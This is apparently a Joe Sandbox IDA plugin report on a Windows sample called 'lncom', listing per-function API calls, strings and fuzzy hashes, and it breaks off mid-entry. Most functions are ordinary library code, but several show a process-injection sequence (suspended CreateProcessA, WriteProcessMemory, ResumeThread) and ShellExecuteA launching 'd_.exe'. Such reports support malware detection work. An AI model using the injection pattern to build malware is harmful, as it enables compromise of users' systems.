Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Window$Active$MessageRect
String ID: (
API String ID: 3147912190-3887548279
Opcode ID: d273b8a798c00f8b97af6bfda92a0f9e4f718c68512a4b1c0487428dda421e1d
Instruction ID: 9346dad9e3a69b9d28e73384e295fefd63e9c3c7b567f0a0de53f9ad6ff94f66
Opcode Fuzzy Hash: d273b8a798c00f8b97af6bfda92a0f9e4f718c68512a4b1c0487428dda421e1d
Instruction Fuzzy Hash: E0410BB5E00108AFDB04DBE9CD95FAE7BF9EB88300F14456AF604E7391E674AD008B55

Uniqueness

Uniqueness Score: -1.00%

Function 0045EF50 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122fileCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,000009EC,00000000), ref: 0045EFF2
MulDiv.KERNEL32(?,000009EC,00000000), ref: 0045F00F
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0045F03B
GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0045F05B
DeleteEnhMetaFile.GDI32(00000016), ref: 0045F07C
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 0045F08F

Strings

`, xrefs: 0045EFD7

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: FileMeta$Bits$DeleteHeader
String ID: `
API String ID: 1990453761-2679148245
Opcode ID: 7b47163e96567f3a446f3310db594d1fc7d02fa9b76faae4480e02d6b1f81513
Instruction ID: 04382a6843d2c7e20464f9a66aa73b0a0b5032b3d20095ae39c122689e240eaa
Opcode Fuzzy Hash: 7b47163e96567f3a446f3310db594d1fc7d02fa9b76faae4480e02d6b1f81513
Instruction Fuzzy Hash: 1B411F75D00208AFDB10DFA9C585AEEBBF9EF48701F10846AF904E7242E7399D44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5E8 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 120windowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(00000000,00000000), ref: 0040D62D
GetWindow.USER32(?,00000002), ref: 0040D63A
GetWindowTextA.USER32(00000000,?,000004B0), ref: 0040D65B
IsWindowVisible.USER32(00000000), ref: 0040D663

Strings

P, xrefs: 0040D783
Windows services , xrefs: 0040D68A
Program Manager, xrefs: 0040D6A2

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Window$FindTextVisible
String ID: P$Program Manager$Windows services
API String ID: 4105047624-283729272
Opcode ID: 028a57af0da1d864e508a8c0786fb35aa9f8239b4dffdd03a1aaf5f91a03b36e
Instruction ID: 97b7b8a50f61f5d774e0f10fbfae54ebb89633ff9575aedb10f3db3526aaecd3
Opcode Fuzzy Hash: 028a57af0da1d864e508a8c0786fb35aa9f8239b4dffdd03a1aaf5f91a03b36e
Instruction Fuzzy Hash: 4E510B74D102099BDF10EFD1C845AEDBBB4FF45308F10446AE904B73A2EB799A46CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6B4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119injectionprocessthreadCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0040C791
WriteProcessMemory.KERNEL32(?,?,000000EB,00000001,?,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0040C7DC
WriteProcessMemory.KERNEL32(?,?,00000008,00000001,?,?,?,000000EB,00000001,?,00000000,00000000,00000000,00000000,00000000,00000004), ref: 0040C7F3
ResumeThread.KERNEL32(?,?,?,00000008,00000001,?,?,?,000000EB,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C7FB
CloseHandle.KERNEL32(?,?,?,?,00000008,00000001,?,?,?,000000EB,00000001,?,00000000,00000000,00000000,00000000), ref: 0040C803
CloseHandle.KERNEL32(?,?,?,?,?,00000008,00000001,?,?,?,000000EB,00000001,?,00000000,00000000,00000000), ref: 0040C80B

Strings

D, xrefs: 0040C6F8

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Process$CloseHandleMemoryWrite$CreateResumeThread
String ID: D
API String ID: 3226010844-2746444292
Opcode ID: 5943878324a73d9368df15d69f413f381c68c3fd14f2dc8d74f5b8e774419430
Instruction ID: 227c0513b8f715933b6ba69371c96f009d56cc2ed5be3bae9dc35c0122427617
Opcode Fuzzy Hash: 5943878324a73d9368df15d69f413f381c68c3fd14f2dc8d74f5b8e774419430
Instruction Fuzzy Hash: E641107190014EAADF04EFD1C842BEEB7B9FF85304F10816BE505B6152EB785A46CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00442998 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 99windowCOMMON

Download Yara Rule

APIs

@Wsocket@WSocketErrorDesc$qqri.LNCOM(500 ,00000000,00442B76), ref: 004429DA
@Smtpprot@TCustomSmtpClient@SetErrorMessage$qqrv.LNCOM ref: 00442A1B
@Wsocket@TCustomWSocket@SetAddr$qqr17System@AnsiString.LNCOM(00000000,00442B76), ref: 00442A40
@Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState.LNCOM ref: 00442A9D

Strings

tcp, xrefs: 00442A4B
(Winsock error #, xrefs: 004429E2
500 , xrefs: 004429CE

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CustomSmtpSmtpprot@$Client@ErrorStateWsocket@$Addr$qqr17AnsiChange$qqr19Desc$qqriMessage$qqrvSocketSocket@StringSystem@
String ID: (Winsock error #$500 $tcp
API String ID: 2764074828-88745010
Opcode ID: c4feafb5daedac7cbe0aa698166a85bbf7ea2689d484230cbcda0f818b5678b4
Instruction ID: 12ecdb87e817b140b10cb8fe3bdebb3bdbdaa5f91386451bc0bfbda9bff3cd41
Opcode Fuzzy Hash: c4feafb5daedac7cbe0aa698166a85bbf7ea2689d484230cbcda0f818b5678b4
Instruction Fuzzy Hash: 5641F574A00149EFDB00DF95C6859AEBBF1FF49304FA181AAE804AB361D7B4AE01DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00434690 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

@Wsocket@WSocket_WSACancelAsyncRequest$qqrui.LNCOM ref: 004346F1
@Wsocket@WSocket_inet_addr$qqrpc.LNCOM ref: 00434714
@Wsocket@WSocket_inet_ntoa$qqr7in_addr.LNCOM ref: 00434725

Strings

%s: can't start DNS lookup, error #%d, xrefs: 004347A2
DNS lookup: invalid host name., xrefs: 004346BE

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsocket@$AsyncCancelRequest$qqruiSocket_Socket_inet_addr$qqrpcSocket_inet_ntoa$qqr7in_addr
String ID: %s: can't start DNS lookup, error #%d$DNS lookup: invalid host name.
API String ID: 536413786-3768544318
Opcode ID: 324cf549697812ec8ae3498cb199cab6b48a71c968c99390eb65b99c6fbd37fb
Instruction ID: 3dfcdfbc488b2a90364faec430ccf36f63a8379dc2e76c1276684dbd8d2c4c12
Opcode Fuzzy Hash: 324cf549697812ec8ae3498cb199cab6b48a71c968c99390eb65b99c6fbd37fb
Instruction Fuzzy Hash: 5541DC74A00108EFCB04DFA9C585A9DBBF1FF49304F6041BAE415AB361D738AE45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040C8D5 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 85stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,00000000), ref: 0040C941
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 0040C994

Strings

(, xrefs: 0040C906
open, xrefs: 0040C98D
d_.exe, xrefs: 0040C8DB
P, xrefs: 0040C999
y10160, xrefs: 0040C99F

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: ExecuteShelllstrcat
String ID: ($P$d_.exe$open$y10160
API String ID: 4081138647-3859825123
Opcode ID: be8eda6a80c785c50e3a35dad1164a71f0833ec56290fd9b6a5674981c228d7e
Instruction ID: aa71d2c3d326bbc57bf07d743ae5643578aa34616c88e9062146805f23f24085
Opcode Fuzzy Hash: be8eda6a80c785c50e3a35dad1164a71f0833ec56290fd9b6a5674981c228d7e
Instruction Fuzzy Hash: 8C318430A0011D9ADB00EFE1D846BEDB3B8FF99308F10806FE505B7192D7B85A099B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00488B60 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66stringCOMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,?), ref: 00488B91
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00488BB8
GetSystemMetrics.USER32(00000000), ref: 00488BCD
GetSystemMetrics.USER32(00000001), ref: 00488BD8
lstrcpy.KERNEL32(?,DISPLAY), ref: 00488C05

Part of subcall function 00488680: GetProcAddress.KERNEL32(748F0000,00000000), ref: 00488700

Strings

GetMonitorInfo, xrefs: 00488B78
DISPLAY, xrefs: 00488BFC

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfo
API String ID: 1539801207-1633989206
Opcode ID: 027741bac6c3c1abe423157e36615d4289918bdaae459a6cc02ecc9b52aed71a
Instruction ID: 0ac14c24b2df6f27698416e231d8ce82d16333861026fa12f928fe1c349213b5
Opcode Fuzzy Hash: 027741bac6c3c1abe423157e36615d4289918bdaae459a6cc02ecc9b52aed71a
Instruction Fuzzy Hash: 7611DF316023049FE720AF619D447ABB7A8EB18750F44092FE946C7680EB78A844DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004360D8 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

@Wsocket@WSocket_WSAGetLastError$qqrv.LNCOM(00000000,004361B6), ref: 00436105

Part of subcall function 00431938: @Wsocket@WSocketGetProc$qqrx17System@AnsiString.LNCOM ref: 0043194A

@Wsocket@WSocketErrorDesc$qqri.LNCOM(004361F4,?, in function ,?,Error ,00000000,004361B6), ref: 00436133
@Wsocket@WSocket_closesocket$qqri.LNCOM(?,004361F4,?, in function ,?,Error ,00000000,004361B6), ref: 00436163
@Wsocket@TCustomWSocket@ChangeState$qqr20Wsocket@TSocketState.LNCOM ref: 0043617A

Strings

I', xrefs: 00436151
in function , xrefs: 00436120
Error , xrefs: 0043610D

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsocket@$Socket$AnsiChangeCustomDesc$qqriErrorError$qqrvLastProc$qqrx17Socket@Socket_Socket_closesocket$qqriStateState$qqr20StringSystem@
String ID: in function $Error $I'
API String ID: 1171291797-704532963
Opcode ID: b94674765e81fe60f6af33d7786f26db09ccb06b4e52742ec304644340ef6c41
Instruction ID: 0dde56ffb6322f69e3d5eddae935ed9362f97340c1de113055aac93a043df740
Opcode Fuzzy Hash: b94674765e81fe60f6af33d7786f26db09ccb06b4e52742ec304644340ef6c41
Instruction Fuzzy Hash: 96211B74E0020AEFCF00EF95C94199EBBB5EF49314F6181AAE414A7362D7786E05CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00446578 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 53COMMON

Download Yara Rule

APIs

@Wsocket@TCustomWSocket@$bctr$qqrp18Classes@TComponent.LNCOM ref: 0044659B
@Wsocket@TCustomLineWSocket@$bctr$qqrp18Classes@TComponent.LNCOM ref: 004465AA
@Ftpsrvc@TFtpCtrlSocket@SetRcvSize$qqri.LNCOM ref: 00446617

Strings

220-ICS FTP Server ready, xrefs: 004465D3
I, xrefs: 004463EF
4C, xrefs: 004465A5
DataWSocket, xrefs: 004465B8
B, xrefs: 004461B4
C:\, xrefs: 004465EF

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Classes@ComponentCustomSocket@$bctr$qqrp18Wsocket@$CtrlFtpsrvc@LineSize$qqriSocket@
String ID: 220-ICS FTP Server ready$4C$B$C:\$DataWSocket$I
API String ID: 480217052-2682465319
Opcode ID: 3f0a40c911e46dc17bef64dad90c206ff987e16b31457c7f6eb9548109980be8
Instruction ID: 81b20d94e78de3715e993a22c5e9ba2811894eb7ed825f1ccfc692263baca826
Opcode Fuzzy Hash: 3f0a40c911e46dc17bef64dad90c206ff987e16b31457c7f6eb9548109980be8
Instruction Fuzzy Hash: E2215E70A00544DBDB00DB98D98279EB7B2AF45305F2582B9E8049B351CB399F01DF89

Uniqueness

Uniqueness Score: -1.00%

Function 004528F4 Relevance: 12.2, APIs: 8, Instructions: 194memoryCOMMON

Download Yara Rule

APIs

GlobalUnWire.KERNEL32(?), ref: 0045293C
GlobalFree.KERNEL32(?), ref: 00452945
GlobalFix.KERNEL32(?), ref: 00452955
739FD660.WINSPOOL.DRV(?,00000000,00452B2B,?,00000000,00000000,00000000,?,00452F0D,00000000,00000000,?,00000001,00000000,00000005,00000000), ref: 00452978
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,00000000,?,?,00000000,00000000,0000002C,00000000,?,00000000,00000000,00000000), ref: 00452AB3
GlobalFix.KERNEL32(00000000), ref: 00452AC2
GlobalUnWire.KERNEL32(?), ref: 00452AE7
GlobalFree.KERNEL32(?), ref: 00452AF0

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Global$FreeWire$AllocD660.
String ID:
API String ID: 3165141891-0
Opcode ID: 289b2cf044b4f7c0c412ab896bbc889ea5cfa72a837bfaea8408326c359b8b56
Instruction ID: 67829a0d03a7ddf96f4bba334f2e68bd438e0fe6d291c20ab499f05cc46bbf3f
Opcode Fuzzy Hash: 289b2cf044b4f7c0c412ab896bbc889ea5cfa72a837bfaea8408326c359b8b56
Instruction Fuzzy Hash: 84714CB1A002049FCB10DF69C981B8A77F9EF49315F2141AAF808DB356CB78ED45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0046B5AC Relevance: 12.1, APIs: 8, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 0046B622
GetCapture.USER32 ref: 0046B631
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 0046B637
ReleaseCapture.USER32 ref: 0046B63C
GetActiveWindow.USER32 ref: 0046B64B
SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 0046B6E1
SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 0046B748
GetActiveWindow.USER32 ref: 0046B757

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID:
API String ID: 862346643-0
Opcode ID: d76b2ba7523d2c31ae9fd18113281e440e22bd21deff5295efb9b10d54bee41d
Instruction ID: d4c10d8ff7967a08f1da788bcb4129bbb4ee6ff3e5062404d351d2ca005a7fd8
Opcode Fuzzy Hash: d76b2ba7523d2c31ae9fd18113281e440e22bd21deff5295efb9b10d54bee41d
Instruction Fuzzy Hash: 2B514D30A012049FDB10EF6AC986B9E77F5EF85304F1140A6F904DB362E738AD40DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0045D29C Relevance: 12.1, APIs: 8, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0045D2CA
GetDeviceCaps.GDI32(?,00000068), ref: 0045D2E6
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0045D305
GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 0045D329
GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 0045D347
GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 0045D35B
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0045D37B
ReleaseDC.USER32(00000000,?), ref: 0045D393

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: EntriesPaletteSystem$CapsDeviceRelease
String ID:
API String ID: 1781840570-0
Opcode ID: 5ca6830c5e829c9505b4332bb9f29281e0a62181ac4b630f0851138c8ccd1633
Instruction ID: 491fbfe04e17589781fd031e46777b5093e31f69ece24ceb990f424f851149ba
Opcode Fuzzy Hash: 5ca6830c5e829c9505b4332bb9f29281e0a62181ac4b630f0851138c8ccd1633
Instruction Fuzzy Hash: 1D2171B5A40209FBEB10DBA5CD85FAE73ACEB08705F51049AFB04E6181D6789E44DB39

Uniqueness

Uniqueness Score: -1.00%

Function 00402578 Relevance: 12.1, APIs: 8, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 0040258D
socket.WS2_32(00000002,00000002,00000011), ref: 004025B0

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
